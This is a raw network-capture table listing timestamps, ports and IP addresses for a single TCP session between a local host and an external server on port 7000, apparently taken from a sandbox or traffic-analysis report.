Oct 13, 2024 19:04:15.032445908 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:15.121442080 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:15.122706890 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:15.127906084 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:19.527105093 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:19.581506014 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:19.586736917 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:19.586754084 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:19.586796045 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:19.586808920 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:19.586821079 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:19.586832047 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:19.586894035 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:19.587184906 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:20.060856104 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:20.204313040 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:20.312041044 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:20.317236900 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:20.322107077 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:24.107896090 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:24.112921000 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:24.218338013 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:24.227813005 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:24.232717037 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:24.521559954 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:24.552251101 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:24.557286978 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:24.557306051 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:24.557312965 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:24.557383060 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:24.557391882 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:24.557544947 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:24.557549953 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:24.557554960 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:25.076658964 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:25.081645966 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:25.092143059 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:25.097002029 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:25.154608965 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:25.159565926 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:25.186625957 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:25.189851046 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:25.238665104 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:25.238748074 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:25.243587017 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:25.248409986 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:25.250473022 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:25.283747911 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:25.285413027 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:25.330599070 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:25.330763102 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:25.335637093 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:25.379333973 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:25.380984068 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:25.385982990 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:25.435765028 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:25.440658092 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:25.474766016 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:25.476202965 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:25.522732019 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:25.529500008 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:25.533935070 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:25.538968086 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:25.569982052 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:25.573863029 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:25.622656107 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:26.841989040 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:26.847006083 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:26.952630043 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:26.953644037 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:26.958616972 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:29.170389891 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:29.175527096 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:29.281141043 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:29.282553911 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:29.287548065 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:29.521200895 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:29.554734945 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:29.560144901 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:29.560182095 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:29.560209036 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:29.560261965 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:29.560290098 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:29.560316086 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:29.560342073 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:29.560372114 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:31.373450994 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:31.378828049 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:31.485110044 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:31.486424923 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:31.491302013 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:34.521100044 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:34.553514957 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:34.558624983 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:34.558640957 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:34.558676958 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:34.558689117 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:34.558700085 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:34.558963060 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:34.559042931 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:34.559055090 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:35.702272892 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:35.707314014 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:36.002479076 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:36.039005041 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:36.041817904 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:36.043670893 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:36.048583031 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:39.439166069 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:39.527841091 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:39.531847000 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:39.565716028 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:39.571593046 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:39.571629047 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:39.571655989 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:39.571681976 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:39.571712017 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:39.571738958 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:39.571763992 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:39.571789980 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:40.748229980 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:40.754102945 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:40.867166996 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:40.868043900 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:40.872993946 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:44.520683050 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:44.667207956 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:44.672241926 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:44.672257900 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:44.672271013 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:44.672276974 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:44.672288895 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:44.672621965 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:44.672637939 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:44.672794104 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:46.497991085 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:46.503046989 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:46.611126900 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:46.611999989 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:46.616910934 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:49.520750999 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:49.549398899 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:49.554507017 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:49.554521084 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:49.554534912 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:49.554542065 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:49.554549932 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:49.554771900 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:49.554799080 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:49.554806948 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:54.547630072 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:54.582088947 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:54.587169886 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:54.587174892 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:54.587189913 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:54.587193012 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:54.587201118 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:54.587212086 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:54.587214947 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:54.587243080 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:59.524111986 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:59.593312979 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:59.611305952 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:59.616539001 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:59.616550922 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:59.616563082 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:59.616566896 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:59.616578102 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:59.616588116 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:59.616595030 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:59.616621971 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:00.669729948 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:00.674923897 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:00.991766930 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:00.992732048 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:00.997683048 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:01.122868061 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:01.127870083 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:01.138793945 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:01.143655062 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:01.201205969 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:01.206294060 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:01.216716051 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:01.221621990 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:01.233228922 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:01.234194040 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:01.282381058 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:01.282458067 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:01.287754059 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:01.296062946 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:01.296892881 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:01.321902990 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:01.322065115 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:01.376986027 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:01.377219915 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:01.430166006 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:01.430322886 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:01.435173988 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:01.471174002 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:01.472203016 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:01.518055916 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:01.524038076 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:01.524859905 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:01.529721022 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:01.529937029 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:01.534955978 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:01.560514927 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:01.565463066 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:01.565956116 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:01.566864014 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:01.618062019 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:01.749449015 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:01.750226974 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:01.755079985 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:01.990278006 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:01.997514009 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:02.002332926 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:03.799242973 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:03.804411888 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:03.909624100 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:03.913428068 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:03.918366909 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:04.521061897 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:04.567451954 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:04.572520971 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:04.572537899 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:04.572577000 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:04.572582006 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:04.572594881 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:04.572988033 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:04.573004007 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:04.573678017 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:06.732177973 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:06.737257004 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:06.842611074 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:06.843482018 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:06.848381996 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:09.718251944 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:09.908847094 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:09.908898115 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:09.908932924 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:09.909146070 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:09.909235954 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:09.909235954 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:09.912878036 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:09.946155071 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:09.951680899 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:09.951702118 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:09.951752901 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:09.951765060 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:09.956458092 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:09.956470013 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:09.956481934 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:09.956492901 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:10.057053089 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:10.058459997 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:10.066493988 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:12.372767925 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:12.378247023 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:12.483270884 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:12.486973047 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:12.492397070 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:14.513844013 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:14.518948078 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:14.521260023 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:14.567141056 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:14.572356939 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:14.572381973 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:14.572647095 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:14.572659969 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:14.654711008 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:14.655457020 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:14.706058025 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:17.920234919 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:17.925765038 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:18.032224894 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:18.033934116 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:18.038866997 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:19.520977974 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:19.566253901 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:19.571499109 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:19.571543932 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:19.571574926 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:19.571600914 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:19.571629047 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:19.571645975 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:19.571681976 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:19.571707964 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:24.536727905 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:24.563031912 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:24.568306923 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:24.568337917 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:24.568384886 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:24.568412066 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:24.568464041 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:24.568490028 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:24.568536043 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:24.568562031 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:29.536508083 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:29.563771009 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:29.569014072 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:29.569056988 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:29.569102049 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:29.569129944 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:29.569164038 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:29.569240093 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:29.569266081 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:29.569300890 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:32.763797045 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:32.769068956 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:32.877197981 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:32.878073931 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:32.883089066 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:34.536046028 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:34.563620090 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:34.568830967 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:34.569029093 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:34.569057941 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:34.569103956 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:34.569132090 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:34.569156885 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:34.569186926 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:34.569580078 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:39.442302942 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:05:39.497355938 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:05:39.574642897 CEST	7000	49739	198.23.219.104	192.168.2.4
